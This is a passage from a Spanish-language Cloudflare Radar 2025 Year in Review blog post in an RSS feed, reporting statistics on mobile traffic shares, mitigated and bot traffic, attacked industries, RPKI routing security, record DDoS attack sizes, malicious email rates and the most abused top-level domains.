href="https://radar.cloudflare.com/year-in-review/2025/sd#mobile-vs-desktop"><u>Sudán</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/mw#mobile-vs-desktop"><u>Malaui</u></a>, con un 75 % y un 74 % respectivamente. Otros cinco países / regiones africanos — <a href="https://radar.cloudflare.com/year-in-review/2025/sz#mobile-vs-desktop"><u>Esuatini (Suazilandia)</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/ye#mobile-vs-desktop"><u>Yemen</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/bw#mobile-vs-desktop"><u>Botsuana</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025/mz#mobile-vs-desktop"><u>Mozambique</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025/so#mobile-vs-desktop"><u>Somalia</u></a> — también registraron porcentajes de solicitudes móviles superiores al 70 % en 2025, en consonancia con la <a href="https://voxdev.org/topic/understanding-mobile-phone-and-internet-use-across-world"><u>elevada tasa de propiedad de teléfonos móviles</u></a> en la región. Entre los países / regiones con una baja cuota de tráfico de dispositivos móviles, <a href="https://radar.cloudflare.com/year-in-review/2025/gi#mobile-vs-desktop"><u>Gibraltar</u></a> fue el único que se situó por debajo del 10 % (con un 5,1 %), y solo otros seis registraron menos de una cuarta parte de las solicitudes procedentes de dispositivos móviles. Esta cifra es inferior a la de <a href="https://radar.cloudflare.com/year-in-review/2024#mobile-vs-desktop"><u>2024</u></a>, cuando una docena de países / regiones tenía una cuota móvil inferior al 25 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fcUaDzUxKouChLsJzfQf5/13e3eb93633c6d5ed017378022218505/BLOG-3077_50_-_connectivity-mobiledesktop.png" />
          </figure><p><i><sup>Distribución del tráfico por tipo de dispositivo en 2025, a nivel mundial</sup></i></p><p></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6X1wD6uZUA4eB5vyf3vwl6/72a9445980b21e2917424eca151c77b4/BLOG-3077_51_-_connectivity-mobiledesktop-map.png" />
          </figure><p><i><sup>Distribución global del tráfico por tipo de dispositivo en 2025</sup></i></p>
    <div>
      <h2>Seguridad</h2>
      <a href="#seguridad">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1X1yOLxEicpVw5U4ukcAQF/f7d0b02841a8220151a66cd6f0226302/BLOG-3077_52_-_image18.png" />
          </figure>
    <div>
      <h3>El 6 % del tráfico global fue mitigado por nuestros sistemas, ya fuera por ser potencialmente malicioso o por motivos definidos por los clientes</h3>
      <a href="#el-6-del-trafico-global-fue-mitigado-por-nuestros-sistemas-ya-fuera-por-ser-potencialmente-malicioso-o-por-motivos-definidos-por-los-clientes">
        
      </a>
    </div>
    <p>Cloudflare mitiga automáticamente el tráfico de ataque dirigido a sitios web y aplicaciones de clientes mediante técnicas de mitigación de <a href="https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/"><u>DDoS</u></a> o <a href="https://developers.cloudflare.com/waf/managed-rules/"><u>reglas gestionadas del firewall de aplicaciones web (WAF)</u></a>, protegiéndolos de diversas amenazas planteadas por los ciberdelincuentes. También permitimos a los clientes mitigar el tráfico, incluso si no es malicioso, utilizando técnicas como la <a href="https://developers.cloudflare.com/waf/rate-limiting-rules/"><u>limitación de velocidad</u></a> de las solicitudes o el <a href="https://developers.cloudflare.com/waf/tools/ip-access-rules/"><u>bloqueo de todo el tráfico desde una ubicación determinada</u></a>. La necesidad de hacerlo puede deberse a requisitos normativos o empresariales. Analizamos la proporción total del tráfico hacia la red de Cloudflare a lo largo de 2025 que se mitigó por cualquier motivo, así como la proporción que se bloqueó como ataque DDoS o mediante reglas gestionadas por el WAF.</p><p>Este año, <a href="https://radar.cloudflare.com/year-in-review/2025/#mitigated-traffic"><u>se mitigó el 6,2 % del tráfico global</u></a>, un cuarto de punto porcentual menos <a href="https://radar.cloudflare.com/year-in-review/2024#mitigated-traffic"><u>que en 2024</u></a>. El 3,3 % del tráfico se mitigó como parte de un ataque DDoS o mediante reglas gestionadas, lo que supone un aumento de una décima de punto porcentual con respecto al año anterior. Se aplicaron mitigaciones generales a más del 10 % del tráfico procedente de más de 30 países / regiones, mientras que en 14 países / regiones se aplicaron mitigaciones DDoS / WAF a más del 10 % del tráfico originado. Ambos recuentos disminuyeron en comparación con 2024. </p><p>Guinea Ecuatorial fue el país con mayor porcentaje de tráfico mitigado, ya que el 40 % se mitigó de forma general y el 29 % se mitigó con medidas DDoS / WAF. Estas cuotas crecieron durante el último año, pasando del 26 % (general) y el 19 % (DDoS / WAF). Por el contrario, Dominica tuvo las proporciones más bajas de tráfico mitigado, solo el 0,7 %, y las mitigaciones DDoS / WAF se aplicaron solo al 0,1 %.</p><p>El gran aumento en el tráfico mitigado observado durante julio en el gráfico a continuación se debe a una campaña de ataques DDoS de gran envergadura que se dirigió principalmente a un único dominio de cliente de Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xzs0onu96x2qCwGRNHrPW/a730564c03b600f793ae92df8ad38ee8/BLOG-3077_53_-_security-mitigatedtraffic.png" />
          </figure><p><i><sup>Tendencias del tráfico mitigado en 2025, a nivel mundial</sup></i></p>
    <div>
      <h3>El 40 % del tráfico global de bots procedía de Estados Unidos, y Amazon Web Services y Google Cloud Platform originaron una cuarta parte del tráfico global de bots</h3>
      <a href="#el-40-del-trafico-global-de-bots-procedia-de-estados-unidos-y-amazon-web-services-y-google-cloud-platform-originaron-una-cuarta-parte-del-trafico-global-de-bots">
        
      </a>
    </div>
    <p>Un <a href="https://developers.cloudflare.com/bots/concepts/bot/"><u>bot</u></a> es una aplicación de software programada para realizar determinadas tareas, y Cloudflare utiliza <a href="https://blog.cloudflare.com/bots-heuristics/"><u>heurística</u></a> avanzada para diferenciar entre el tráfico de bots y el tráfico humano, <a href="https://developers.cloudflare.com/bots/concepts/bot-score/"><u>puntuando</u></a> cada solicitud según la probabilidad de que se origine en un bot o en un usuario humano. Mediante el control de tráfico que se sospecha que proviene de bots, los propietarios de sitios y aplicaciones pueden detectar y, si es necesario, bloquear actividades potencialmente maliciosas. Sin embargo, no todos los bots son maliciosos — los bots también pueden ser útiles, y Cloudflare mantiene un <a href="https://radar.cloudflare.com/bots/directory?kind=all"><u>directorio de bots verificados</u></a> que incluye los que se utilizan para cosas como la <a href="https://radar.cloudflare.com/bots/directory?category=SEARCH_ENGINE_CRAWLER&amp;kind=all"><u>indexación de motores de búsqueda</u></a>, el <a href="https://radar.cloudflare.com/bots/directory?category=SECURITY&amp;kind=all"><u>análisis de seguridad</u></a> y el <a href="https://radar.cloudflare.com/bots/directory?category=MONITORING_AND_ANALYTICS&amp;kind=all"><u>monitoreo de sitios / aplicaciones</u></a>. Independientemente de la intención, analizamos de <a href="https://radar.cloudflare.com/year-in-review/2025/#bot-traffic-sources"><u>dónde se originaba el tráfico de bots en 2025</u></a>, utilizando la dirección IP de una solicitud para identificar la red (<a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/"><u>sistema autónomo</u></a>) y el país / región asociados al bot que realizaba la solicitud. </p><p>A nivel mundial, los 10 principales países / regiones representaron el 71 % del tráfico de bots observado. El 40 % procedía de Estados Unidos, muy por encima del 6,5 % de Alemania. La cuota de Estados Unidos aumentó más de cinco puntos porcentuales <a href="https://radar.cloudflare.com/year-in-review/2024#bot-traffic-sources"><u>desde 2024</u></a>, mientras que la cuota de Alemania disminuyó una fracción de punto porcentual. El resto de países de entre los diez primeros contribuyeron con un porcentaje de tráfico de bots inferior al 5 % en 2025.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/29tI5aXT8HeRwmzHMyFaTt/0081d745e48499966611a4d2f3a14f2e/BLOG-3077_54_-_security-bottraffic-countries.png" />
          </figure><p><i><sup>Distribución global del tráfico de bots por país / región de origen en 2025</sup></i></p><p>Si analizamos el tráfico de bots por red, observamos que las plataformas en la nube siguieron siendo una de los principales orígenes. Esto se debe a varios factores, entre los que se incluyen la facilidad de uso de herramientas automatizadas para aprovisionar rápidamente recursos informáticos, su coste relativamente bajo, su amplia distribución geográfica y la conectividad a Internet de gran ancho de banda de las plataformas. </p><p>Dos sistemas autónomos asociados con Amazon Web Services representaron un total del 14,4 % del tráfico de bots observado, y dos sistemas autónomos asociados con Google Cloud fueron responsables de un 9,7 % del tráfico de bots. Les siguió Microsoft Azure, que originó el 5,5 % del tráfico de bots. Las cuotas de las tres plataformas aumentaron en comparación con 2024. Estas plataformas en la nube tienen una fuerte presencia regional en centros de datos en muchos de los países / regiones que figuran entre los 10 primeros. En otros lugares del mundo, los proveedores locales de telecomunicaciones representaban con frecuencia la mayor parte del tráfico de bots automatizado que se observaba en esos países o regiones.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3NCt3TgkYWbl9cQmZH2QZW/3ed0e512bdff74025dd34744b989dc41/BLOG-3077_55_-_security-bottraffic-asns.png" />
          </figure><p><i><sup>Distribución global del tráfico de bots por red de origen en 2025</sup></i></p>
    <div>
      <h3>Las organizaciones del sector "Personas y sociedad" fueron las más afectadas durante 2025</h3>
      <a href="#las-organizaciones-del-sector-personas-y-sociedad-fueron-las-mas-afectadas-durante-2025">
        
      </a>
    </div>
    <p>Los atacantes cambian constantemente sus tácticas y objetivos, combinando diferentes elementos para intentar evadir la detección o en función del daño que pretenden causar. Pueden intentar causar daños financieros a empresas atacando sitios de comercio electrónico durante periodos de alta actividad comercial, hacer declaraciones políticas atacando sitios relacionados con el gobierno o la sociedad civil, o intentar dejar fuera de combate a sus oponentes atacando un servidor de videojuegos. Para identificar la actividad de los ataques a las industrias objetivo durante 2025, analizamos el tráfico mitigado de clientes que tenían una industria asociada y vertical en su registro de clientes. El tráfico mitigado se agregaba semanalmente por país / región de origen en 17 sectores verticales objetivo.</p><p>Las organizaciones del sector "Personas y sociedad" fueron las <a href="https://radar.cloudflare.com/year-in-review/2025/#most-attacked-industries"><u>más afectadas durante el año</u></a>, ya que el 4,4 % del tráfico mitigado a nivel mundial se dirigió a este sector. Los clientes clasificados como "Personas y sociedad" incluyen instituciones religiosas, organizaciones sin ánimo de lucro, organizaciones cívicas y sociales y bibliotecas. El sector comenzó el año con menos del 2 % del tráfico mitigado, pero vio cómo la cuota aumentaba hasta el 10 % la semana del 5 de marzo y superaba el 17 % a finales de mes. Otros picos de ataques dirigidos a estos sitios se produjeron a finales de abril (hasta el 19,1 %) y principios de julio (hasta el 23,2 %). Muchos de estos tipos de organizaciones están protegidas por el proyecto Galileo de Cloudflare, y <a href="https://blog.cloudflare.com/celebrating-11-years-of-project-galileo-global-impact/"><u>esta entrada de blog</u></a> detalla los ataques y las amenazas que sufrieron en 2024 y 2025.</p><p>Las apuestas y los videojuegos, el sector más afectado el año pasado, registraron una caída interanual de más de la mitad en la proporción de ataques mitigados, hasta situarse en solo el 2,6 %. Aunque cabría esperar que los ataques dirigidos a sitios web de apuestas alcanzaran su punto álgido en torno a grandes eventos deportivos como la Super Bowl y la March Madness, esta tendencia no se hizo evidente, ya que la proporción de ataques alcanzó su punto máximo, un 6,5 %, la semana del 5 de marzo, un mes después de la Super Bowl y un par de semanas antes del inicio de la March Madness.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6HqH4NQhC77KEgh1Z3tJDw/a9787f0913ad8160607a1cb21de6347a/BLOG-3077_56_-_security-mostattackedverticals.png" />
          </figure><p><i><sup>Cuota global de tráfico mitigado por sector vertical en 2025, vista resumida</sup></i></p>
    <div>
      <h3>La seguridad del enrutamiento, medida como la proporción de rutas válidas RPKI y el espacio de direcciones IP cubierto, experimentó una mejora continua a lo largo de 2025</h3>
      <a href="#la-seguridad-del-enrutamiento-medida-como-la-proporcion-de-rutas-validas-rpki-y-el-espacio-de-direcciones-ip-cubierto-experimento-una-mejora-continua-a-lo-largo-de-2025">
        
      </a>
    </div>
    <p>El protocolo BGP (Border Gateway Protocol) es el protocolo de enrutamiento central de Internet, que permite que el tráfico fluya entre el origen y el destino mediante la comunicación de rutas entre redes. Sin embargo, dado que se basa en la confianza entre redes conectadas, la información incorrecta compartida entre pares (ya sea de forma intencionada o no) puede enviar el tráfico al lugar equivocado, posiblemente a <a href="https://blog.cloudflare.com/bgp-leaks-and-crypto-currencies/"><u>sistemas controlados por un atacante</u></a>. Para solucionar este problema, se desarrolló la<a href="https://blog.cloudflare.com/rpki/"><u> Infraestructura de Clave Pública de Recursos (RPKI)</u></a> como método criptográfico para firmar registros que asocian un anuncio de ruta BGP con el número correcto del sistema autónomo de origen, con el fin de garantizar que la información compartida proviene originalmente de una red autorizada para hacerlo. Cloudflare ha sido un firme defensor de la seguridad del enrutamiento, entre otras cosas como participante fundador del programa <a href="https://www.internetsociety.org/news/press-releases/2020/leading-cdn-and-cloud-providers-join-manrs-to-improve-routing-security/"><u>MANRS CDN y Cloud Programme</u></a> y mediante la provisión de una <a href="https://isbgpsafeyet.com/"><u>herramienta pública</u></a> que permite a los usuarios comprobar si su proveedor de Internet ha implementado BGP de forma segura.</p><p>Analizamos los datos disponibles en la <a href="https://radar.cloudflare.com/routing"><u>página de enrutamiento</u></a> de Cloudflare Radar para determinar el porcentaje de <a href="https://rpki.readthedocs.io/en/latest/about/help.html"><u>rutas válidas de RPKI</u></a> y cómo cambió ese porcentaje a lo largo de 2025, así como para determinar el <a href="https://radar.cloudflare.com/year-in-review/2025/#routing-security"><u>porcentaje de espacio de direcciones IP cubierto por rutas válidas</u></a>. Esta última métrica es digna de mención porque un anuncio de ruta que cubre una gran cantidad de espacio de direcciones IP (millones de direcciones IPv4) tiene un impacto potencial mayor que un anuncio que cubre un pequeño bloque de espacio de direcciones IP (cientos de direcciones IPv4).</p><p>Comenzamos el año 2025 con un 50 % de rutas IPv4 válidas, que aumentaron hasta el 53,9 % el 2 de diciembre. La proporción de rutas IPv6 válidas aumentó hasta el 60,1 %, lo que supone un incremento de 4,7 puntos porcentuales. Si nos fijamos en la cuota global del espacio de direcciones IP cubierto por rutas válidas, IPv4 aumentó hasta el 48,5 %, lo que supone un incremento de tres puntos porcentuales. La cuota del espacio de direcciones IPv6 cubierto por rutas válidas descendió ligeramente hasta el 61,6 %. Aunque la variación interanual de estas métricas se está ralentizando, hemos logrado un progreso significativo en los últimos cinco años. Desde principios de 2020, la cuota de rutas IPv4 válidas RPKI y el espacio de direcciones IPv4 se han multiplicado por tres aproximadamente.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4EtRqY7MgRKLxjsLIlNuis/013b3bf92c6d3b173cd8086b1ff370c4/BLOG-3077_57_-_security-routingsecurity-routes.png" />
          </figure><p><i><sup>Cuota de entradas de enrutamiento válidas RPKI globales por versión IP en 2025</sup></i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3JEv5ViM6qYdYxSzE6sbYD/4f89f5acbd2aeef55562fbee63dd2f07/BLOG-3077_58_-_security-routingsecurity-addressspace.png" />
          </figure><p><i><sup>Cuota del espacio de direcciones IP anunciado a nivel mundial cubierto por rutas válidas RPKI en 2025</sup></i></p><p><a href="https://radar.cloudflare.com/year-in-review/2025/bb#routing-security"><u>Barbados</u></a> experimentó el mayor crecimiento en la cuota de rutas IPv4 válidas, aumentando del 2,2 % al 20,8 %. En cuanto a rutas IPv6 válidas, <a href="https://radar.cloudflare.com/year-in-review/2025/ml#routing-security"><u>Malí</u></a> experimentó el mayor crecimiento porcentual en 2025, pasando del 10,0 % al 58,3 %. </p><p>Barbados también experimentó el mayor aumento en la cuota de espacio IPv4 cubierto por rutas válidas, pasando de solo el 2 % al 18,6 %. En cuanto al espacio de direcciones IPv6, tanto <a href="https://radar.cloudflare.com/year-in-review/2025/tj#routing-security"><u>Tayikistán</u></a> como <a href="https://radar.cloudflare.com/year-in-review/2025/dm#routing-security"><u>Dominica</u></a> pasaron de no tener prácticamente ningún espacio cubierto por rutas válidas a principios de año, al 5,5 % y al 3,5 % respectivamente. </p>
    <div>
      <h3>El tamaño de los ataques DDoS hipervolumétricos aumentó significativamente a lo largo del año </h3>
      <a href="#el-tamano-de-los-ataques-ddos-hipervolumetricos-aumento-significativamente-a-lo-largo-del-ano">
        
      </a>
    </div>
    <p>En nuestra serie de informes trimestrales sobre DDoS (<a href="https://blog.cloudflare.com/ddos-threat-report-for-2025-q1/"><u>primer</u></a>, <a href="https://blog.cloudflare.com/ddos-threat-report-for-2025-q2/"><u>segundo</u></a>, <a href="https://blog.cloudflare.com/ddos-threat-report-2025-q3/"><u>tercer</u></a> trimestre), hemos destacado la frecuencia y el tamaño cada vez mayores de los ataques hipervolumétricos a la capa de red dirigidos a los clientes de Cloudflare y a nuestra infraestructura. Definimos un "ataque hipervolumétrico a la capa de red" como aquel que opera en las capas 3/4 y que alcanza picos de más de un terabit por segundo (1 TB/s) o más de 1000 millones de paquetes por segundo. Estos informes ofrecen una perspectiva trimestral, pero también queríamos <a href="https://radar.cloudflare.com/year-in-review/2025/#ddos-attacks"><u>mostrar una visión general de la actividad a lo largo del año</u></a> para comprender cuándo los atacantes son más activos y cómo el tamaño de los ataques ha crecido con el tiempo. </p><p>Si analizamos la actividad de los ataques hipervolumétricos en 2025 desde la perspectiva de los TB/s, julio fue el mes con mayor número de ataques de este tipo, con más de 500, mientras que febrero fue el mes con menos, con poco más de 150. La intensidad de los ataques se mantuvo generalmente por debajo de 5 TB/s, aunque un ataque de 10 TB/s bloqueado a finales de agosto fue un presagio de lo que estaba por venir. Este ataque fue el primero de una campaña de ataques de más de 10 TB/s que tuvo lugar durante la primera semana de septiembre, antes de una serie de ataques de más de 20 TB/s durante la última semana del mes. A principios de octubre, se observaron varios ataques hipervolumétricos cada vez más grandes, y el mayor del mes <a href="https://blog.cloudflare.com/ddos-threat-report-2025-q3/#aisuru-breaking-records-with-ultrasophisticated-hyper-volumetric-ddos-attacks"><u>alcanzó un pico de 29,7 TB/s</u></a>. Sin embargo, ese récord pronto se vio eclipsado, ya que un ataque a principios de noviembre alcanzó los 31,4  TB/s.</p><p>Desde la perspectiva de miles de millones de paquetes por segundo, la actividad de ataques hipervolumétricos fue mucho menor. Noviembre fue el mes con mayor actividad (más de 140 ataques), mientras que solo se registraron tres en febrero y junio. La intensidad de los ataques a lo largo del año se mantuvo generalmente por debajo de 4000 millones de paquetes por segundo hasta finales de agosto, aunque se observó una sucesión de ataques cada vez mayores durante los meses siguientes, alcanzando su punto máximo en octubre. Aunque la intensidad de la mayoría de los más de 110 ataques bloqueados en octubre fue inferior a 5000 millones de paquetes por segundo, un ataque de 14 000 millones de paquetes por segundo detectado durante el mes fue el mayor ataque volumétrico en paquetes por segundo bloqueado durante el año, superando a otros cinco ataques sucesivos que batieron récords y que se produjeron en septiembre.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5q4Ruw6z07JUGXF6FsZMTv/414a388b7f10eff0940a460e1356e938/BLOG-3077_59_-_security-hypervolumetricddos.png" />
          </figure><p><i><sup>Tamaño máximo de los ataques DDoS en 2025</sup></i></p>
    <div>
      <h2>Seguridad del correo electrónico</h2>
      <a href="#seguridad-del-correo-electronico">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1mchtw8EWCzTpDs3K4jQ1A/3b740b7facca7869a4a191808e94ef45/BLOG-3077_60_-_image12.png" />
          </figure>
    <div>
      <h3>Más del 5 % de los mensajes de correo electrónico analizados por Cloudflare resultaron ser maliciosos</h3>
      <a href="#mas-del-5-de-los-mensajes-de-correo-electronico-analizados-por-cloudflare-resultaron-ser-maliciosos">
        
      </a>
    </div>
    <p>Las <a href="https://www.signite.io/emails-are-still-king"><u>estadísticas recientes</u></a> sugieren que el correo electrónico sigue siendo el principal canal de comunicación para los contactos empresariales externos, a pesar del creciente uso empresarial de aplicaciones de colaboración / mensajería. Debido a su amplio uso empresarial, los atacantes aún lo consideran un punto de entrada atractivo a las redes corporativas. Las herramientas de IA generativa <a href="https://blog.cloudflare.com/dispelling-the-generative-ai-fear-how-cloudflare-secures-inboxes-against-ai-enhanced-phishing/"><u>facilitan</u></a> la creación de correos electrónicos maliciosos muy específicos que imitan de manera convincente a marcas de confianza o remitentes legítimos (como ejecutivos de empresas), pero que contienen enlaces engañosos, archivos adjuntos peligrosos u otros tipos de amenazas. <a href="https://www.cloudflare.com/zero-trust/products/email-security/"><u>Cloudflare Email Security</u></a> protege a los clientes de los ataques al correo electrónico, incluidos los que se llevan a cabo a través de mensajes de correo electrónico maliciosos selectivos. </p><p>En 2025, se descubrió que, <a href="https://radar.cloudflare.com/year-in-review/2025/#malicious-emails"><u>de media, el 5,6 % de los correos electrónicos analizados por Cloudflare eran maliciosos</u></a>. El porcentaje de mensajes procesados por Cloudflare Email Security que se identificaron como maliciosos generalmente osciló entre el 4 % y el 6 % durante la mayor parte del año. Nuestros datos muestran un aumento en la proporción de correos electrónicos maliciosos a partir de octubre, probablemente debido a la mejora del sistema de clasificación implementado por Cloudflare Email Security.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/422qqM5R83j6IkdbWdasYR/696a68ded36a67dba1b73e045ab5bb28/BLOG-3077_61_-_emailsecurity-maliciousemailpercentage.png" />
          </figure><p><i><sup>Tendencias globales en el intercambio de correos electrónicos maliciosos en 2025</sup></i></p>
    <div>
      <h3>Los enlaces engañosos, el fraude de identidad y la suplantación de marca fueron los tipos de amenazas más comunes que se encontraron en los mensajes de correo electrónico maliciosos</h3>
      <a href="#los-enlaces-enganosos-el-fraude-de-identidad-y-la-suplantacion-de-marca-fueron-los-tipos-de-amenazas-mas-comunes-que-se-encontraron-en-los-mensajes-de-correo-electronico-maliciosos">
        
      </a>
    </div>
    <p>Los enlaces engañosos fueron la <a href="https://radar.cloudflare.com/year-in-review/2025/#top-email-threats"><u>principal categoría de amenaza de correo electrónico malicioso en 2025</u></a>, presentes en el 52 % de los mensajes, un incremento desde el <a href="https://radar.cloudflare.com/year-in-review/2024#top-email-threats"><u>43 % en 2024</u></a>. Dado que el texto que se muestra para un hipervínculo en HTML se puede configurar de forma arbitraria, los atacantes pueden hacer que una URL parezca que enlaza con un sitio inofensivo cuando, en realidad, enlaza con un recurso malicioso que se puede utilizar para robar credenciales de inicio de sesión o descargar malware. El porcentaje de correos electrónicos procesados que contenían enlaces engañosos alcanzó el 70 % a finales de abril y, de nuevo, a mediados de noviembre.</p><p>El fraude de identidad se produce cuando un atacante envía un correo electrónico haciéndose pasar por otra persona. Pueden hacerlo utilizando dominios que parecen similares, que son falsos o que utilizan trucos con el nombre que se muestra para que parezca que proceden de un dominio de confianza. La suplantación de marca es una forma de engaño de identidad en la que un atacante envía un mensaje de phishing que se hace pasar por una empresa o marca reconocible. La suplantación de marca también puede usar la suplantación de nombre para mostrar o la suplantación de dominio. El fraude de identidad (38 %) y la suplantación de marca (32 %) fueron amenazas que aumentaron un 35 % y un 23 % respectivamente, en 2025 con respecto a 2024. Ambos registraron un aumento a mediados de noviembre.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1sq7v5IqOTPZZ5DwCnr8Mv/762e5bd4dda4c34475ffb5507898a08a/BLOG-3077_62_-_emailsecurity-maliciousemail-threatcategory.png" />
          </figure><p><i><sup>Tendencias en las categorías de amenazas por correo electrónico en 2025, a nivel mundial</sup></i></p>
    <div>
      <h3>Casi todos los mensajes de correo electrónico de los dominios de nivel superior .christmas y .lol resultaron ser spam o maliciosos</h3>
      <a href="#casi-todos-los-mensajes-de-correo-electronico-de-los-dominios-de-nivel-superior-christmas-y-lol-resultaron-ser-spam-o-maliciosos">
        
      </a>
    </div>
    <p>Además de proporcionar información sobre el tráfico, la distribución geográfica y los certificados digitales de los dominios de nivel superior (TLD) como <a href="https://radar.cloudflare.com/tlds/com"><u>.com</u></a> o <a href="https://radar.cloudflare.com/tlds/us"><u>.us</u></a>, Cloudflare Radar también ofrece información sobre los <a href="https://radar.cloudflare.com/security/email#most-abused-tlds"><u>TLD "más utilizados de forma indebida"</u></a>, es decir, aquellos cuyos dominios, según hemos detectado, son los que generan la mayor parte de los correos electrónicos maliciosos y spam entre los mensajes analizados por Cloudflare Email Security. El análisis se basa en el TLD del dominio remitente, que se encuentra en el encabezado "De:" de un mensaje de correo electrónico. Por ejemplo, si un mensaje procede de sender@example.com, entonces example.com es el dominio de envío, y .com es el TLD asociado. Para el análisis de este informe, solo incluimos los TLD de los que observamos un promedio mínimo de 30 mensajes por hora.</p><p>Según los <a href="https://radar.cloudflare.com/year-in-review/2025/#most-abused-tlds"><u>mensajes analizados a lo largo de 2025,</u></a> descubrimos que <a href="https://radar.cloudflare.com/tlds/christmas"><u>.christmas</u></a> y <a href="https://radar.cloudflare.com/tlds/lol"><u>.lol</u></a> fueron los TLD más utilizados para fines maliciosos, ya que el 99,8 % y el 99,6 % de los mensajes procedentes de estos TLD, respectivamente, se caracterizaron como spam o maliciosos. Si ordenamos la lista de TLD por porcentaje de correos maliciosos, <a href="https://radar.cloudflare.com/tlds/cfd"><u>.cfd</u></a> y <a href="https://radar.cloudflare.com/tlds/sbs"><u>.sbs</u></a> tenían más del 90 % de los correos analizados clasificados como maliciosos. El TLD <a href="https://radar.cloudflare.com/tlds/best"><u>.best</u></a> fue el peor en cuanto a porcentaje de spam, y un 69 % de los mensajes se clasificaron como spam.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/tTPjf9VkDFDnzaKCUXE9y/93e88ce8e7f65ef6373308f805b0219f/BLOG-3077_63_-_emailsecurity-maliciousemail-mostabusedtlds.png" />
          </figure><p><i><sup>TLD que han originado la mayor parte del correo electrónico malicioso y spam en 2025</sup></i></p>
    <div>
      <h2>Conclusión</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>Aunque Internet y la web siguen evolucionando y cambiando con el tiempo, parece que algunas de las métricas clave se han vuelto bastante estables. Sin embargo, prevemos que otras métricas, como las que rastrean las tendencias de la IA, evolucionarán en los próximos años a medida que este campo siga avanzando a buen ritmo. </p><p>Te animamos a que visites el micrositio del <a href="https://radar.cloudflare.com/year-in-review/2025"><u>Resumen del año 2025 de Cloudflare Radar</u></a>, explores las tendencias de tu país o región y consideres cómo pueden afectar a tu organización a la hora de planificar el año 2026. También puedes obtener información casi en tiempo real sobre muchas de estas métricas y tendencias en <a href="https://radar.cloudflare.com/"><u>Cloudflare Radar</u></a>. Y, como se ha señalado anteriormente, para obtener información sobre los principales servicios de Internet en múltiples categorías industriales y países / regiones, te recomendamos que leas la entrada del blog "<a href="https://blog.cloudflare.com/radar-2025-year-in-review-internet-services/"><u>Resumen del año</u></a>".</p><p>Si tienes alguna pregunta, puedes ponerte en contacto con el equipo de Cloudflare Radar en <a><u>radar@cloudflare.com</u></a> o en las redes sociales en <a href="https://twitter.com/CloudflareRadar"><u>@CloudflareRadar</u></a> (X), <a href="https://noc.social/@cloudflareradar"><u>https://noc.social/@cloudflareradar</u></a> (Mastodon) y <a href="https://bsky.app/profile/radar.cloudflare.com"><u>radar.cloudflare.com</u></a> (Bluesky).</p>
    <div>
      <h2>Reconocimientos</h2>
      <a href="#reconocimientos">
        
      </a>
    </div>
    <p>Como dice el refrán, se necesita todo un equipo para hacer posible nuestro Resumen del año, desde la recopilación y el análisis de los datos hasta la creación del micrositio y el desarrollo del contenido asociado. Me gustaría expresar mi agradecimiento a los miembros del equipo que han contribuido al esfuerzo de este año: Jorge Pacheco, Sabina Zejnilovic, Carlos Azevedo, Mingwei Zhang, Sofia Cardita (análisis de datos); André Páscoa, Nuno Pereira (desarrollo frontend); João Tomé (servicios de Internet más populares); David Fidalgo, Janet Villarreal y el equipo de internacionalización (traducciones); Jackie Dutton, Kari Linder, Guille Lasarte (comunicaciones); Laurel Wamsley (edición del blog); y Paula Tavares (gestión de ingeniería), así como a otros compañeros de Cloudflare por vuestro apoyo y ayuda.</p> ]]></content:encoded>
            <category><![CDATA[Year in Review (ES)]]></category>
            <category><![CDATA[Radar]]></category>
            <category><![CDATA[Tendencias]]></category>
            <category><![CDATA[Tendencias de Internet]]></category>
            <category><![CDATA[Tráfico de Internet]]></category>
            <category><![CDATA[Interrupción]]></category>
            <category><![CDATA[Calidad de Internet]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">2Mp06VKep73rBpdUmywpQ2</guid>
            <dc:creator>David Belson</dc:creator>
        </item>
        <item>
            <title><![CDATA[15 años mejorando Internet: un repaso a la Semana aniversario 2025]]></title>
            <link>https://blog.cloudflare.com/es-es/birthday-week-2025-wrap-up/</link>
            <pubDate>Mon, 29 Sep 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Sistemas centrales con Rust, actualizaciones poscuánticas, acceso para desarrolladores disponible para estudiantes, integración con PlanetScale, asociaciones de código abierto y 1111 becarios en 2026. ]]></description>
